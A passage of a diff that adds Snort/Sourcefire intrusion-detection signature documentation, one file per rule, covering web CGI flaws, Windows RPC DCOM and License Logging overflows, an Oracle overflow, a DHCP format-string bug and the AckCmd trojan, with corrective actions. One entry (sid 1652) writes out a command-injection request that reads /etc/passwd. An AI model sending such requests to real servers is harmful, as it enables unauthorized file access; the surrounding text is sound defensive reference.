+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_unpaid.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1880.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1880
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/631.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+631
+
+--
+Summary:
+This event is generated when an external user scans an internal SMTP
+server using Network Associates' Cybercop vulnerability scanner. 
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+Cybercop Scanner is scanning software that searches for system
+vulnerabilities. As one of its scanning procedures, it sends an EHLO
+command to SMTP server ports to determine if the SMTP server will return
+a list of remote commands that it accepts.   
+
+--
+Affected Systems:
+Any SMTP server that returns a list of acceptable commands for remote mailers.
+
+--
+Attack Scenarios:
+An attacker may run Cybercop Scanner against SMTP servers in order to
+determine vulnerabilities that can later be exploited.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure that your SMTP server does not provide more information than is
+necessary when it receives an EHLO request.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+General Cybercop information:
+http://www.securityfocus.com/products/126
+
+--
--- /dev/null
+++ b/doc/signatures/3403.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3403
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2913.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2913
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure repcat_import_check
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3106.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3106
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/828.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+828
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1652.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1652
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in version 1.2 of NCSA web server.
+
+--
+Impact:
+File retrieval leading to compromise of confidential information, 
+potential root exploit.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to manipulate a cgi
+script to retrieve files outside the web root of version 1.2 of the NCSA
+web server.
+
+The vulnerability exists in the cgi script "campas"
+
+--
+Affected Systems:
+	web servers running a very old (1995) version of NCSA web 
+	server may have this cgi script installed.
+
+--
+Attack Scenarios:
+The attacker can make an HTTP GET request to the script and include
+variables to retrieve a sensitive system file in the following manner:
+
+GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
+
+--
+Ease of Attack:
+Simple. No exploit software required
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2258.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Messenger service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to improper length validation in the Microsoft Windows Messenger
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, this vulnerability may present the attacker with the
+opportunity to execute code with the privileges of the local system
+account with full access to all resources on the target host.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Service Pack 6a
+	Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6
+	Microsoft Windows 2000, Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP Gold, Service Pack 1
+	Microsoft Windows XP 64-bit Edition
+	Microsoft Windows XP 64-bit Edition Version 2003
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2003 64-bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Disable the Windows messenger service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/575892
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-043.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2319.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2319
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ebola from PLD Software.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Ebola from PLD Software is used to improve the performance of Anti-Virus
+solutions on Linux systems.
+
+A buffer overflow condition is present in the authentication mechanism
+such that it may be triggered by the generation of an error message from
+an unsuccessful authentication attempt.
+
+--
+Affected Systems:
+	All versions of Ebola prior to 0.1.5
+
+--
+Attack Scenarios:
+An attacker can send specially crafted authentication attempts to the Ebola system and
+cause the buffer overflow thus presenting the opportunity to execute
+arbitrary code.
+
+--
+Ease of Attack:
+Simple. Expoits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3102.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3102
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000695.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000695
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "VCard PRO" application running on a webserver. Access to the file "rating.php" with SQL commands being passed as the "card_id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "card_id" parameter in the "rating.php" script used by the "VCard PRO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VCard PRO
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1075.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1075
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2283.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2283
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1527.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+1527
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Basilix webmail PHP script.
+
+An attacker can access mysql.class file to obtain MySQL login and use it
+for further attacks.
+
+--
+Impact:
+Serious. Password disclosure which can lead to further system 
+compromise.
+
+authenticate directly to a mysql database. Many Sun Cobalt Linux servers use Basilix webmail
+
+--
+Detailed Information:
+A webserver usually sends files in the webroot to an anonymous user 
+without further processing. PHP scripts often include files (which 
+contain configuration variables, functions, etc.) that are stored 
+using a suffix that does not prevent a webserver sending them in clear 
+text. The ".class" suffix is not usually explicitly denied in a standard
+web server configuration and the file "mysql.class" may be sent to the 
+attacker.
+
+--
+Attack Scenarios:
+An attacker gets mysql.class containing database login credentials. The attacker can then connect to the database server using the login provided by mysql.class file and modify the database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+File doesn't exist or mysql.class is for example a java class file publicly available on the server
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Basilix script (www.basilix.org)
+
+Check files which contain php code for a suffix that might be rendered in plaintext by the web server.
+
+Workaround - register .class the same way that the extensions .php, .php3 or.php4 are registered in the web server configuration file.
+Note: .class is usually used by java applets
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3042.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3042
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2039.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2039
+
+--
+Summary:
+The Dynamic Host Configuration Protocol (DHCP) daemon is used to issue 
+dynamic IP addresses from a server to client machines. A vulnerability 
+exists such that arbitrary code may be executed on the server using the 
+credential of the super user (root).
+
+--
+Impact:
+Execution of code and possible control of the targeted machine.
+
+--
+Detailed Information:
+A format string vulnerabilty in some versions of dhcpd may lead to the 
+execution of arbitrary code as the root user via a DNS server response. 
+This is due to the unsafe logging of user data. The option NSUPDATE 
+option in the configuration of dhcpd must be enabled, although this is a
+default option in version 3.0 and later.
+
+Two exploits for this vulnerability are known to exist.
+
+--
+Affected Systems:
+ISC DHCPD 3.0
+ Caldera OpenLinux Server 3.1 and 3.1.1
+ Caldera OpenLinux Workstation 3.1 and 3.1.1
+ Conectiva Linux 8.0
+ MandrakeSoft Linux Mandrake 8.1, 8.1 ia64, 8.2, 8.2 ppc and 9.0
+ MandrakeSoft Multi Network Firewall 8.2
+ S.u.S.E. Linux 7.2, 7.3 and 8.0
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server
+ S.u.S.E. Linux Enterprise Server 7 and S/390
+
+ISC DHCPD 3.0.1 rc8 and ISC DHCPD 3.0.1 rc7
+ FreeBSD FreeBSD 4.1.1, 4.2, 4.3, 4.4 and 4.5
+
+ISC DHCPD 3.0.1 rc6
+ S.u.S.E. Linux 8.0 and 8.0 i386
+
+ISC DHCPD 3.0.1 rc5, ISC DHCPD 3.0.1 rc4
+OpenPKG OpenPKG 1.0
+
+ISC DHCPD 3.0.1 rc3, rc2 and rc1
+
+--
+Attack Scenarios:
+The attacker could send a specially crafted packet to the dhcpd server or use one of the exploits widely available for this vulnerability.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches from the vendor should be applied as soon as possible.
+
+Upgrade to ISC DHCPD 3.0.1 rc 9.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4701
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0702
+
+--
--- /dev/null
+++ b/doc/signatures/3098.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3098
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/106.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+106
+
+--
+Summary:
+Backdoor.AckCmd is a Trojan Horse that uses TCP ACK segments to
+communicate. This Trojan may bypass firewalls that do not keep track of
+the session state in a TCP transaction.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows executable that does
+not make changes to the system registry.
+
+AckCmd is a "proof of concept" Trojan.
+
+	SID	Message
+	---	-------
+	106	ACKcmdC trojan scan
+
+This event is indicative of an attacker attempting to locate AckCmd
+servers.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Delete the file AckCmd.exe
+
+A machine reboot is required to clear the existing process from running
+in memory.
+
+In addition, the use of a firewall that correctly checks the state of a
+TCP session is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS485
+
+ntsecurity.nu
+ACK Tunneling Trojans
+http://ntsecurity.nu/papers/acktunneling/
+
+--
--- /dev/null
+++ b/doc/signatures/3317.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3317
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2979.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2979
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
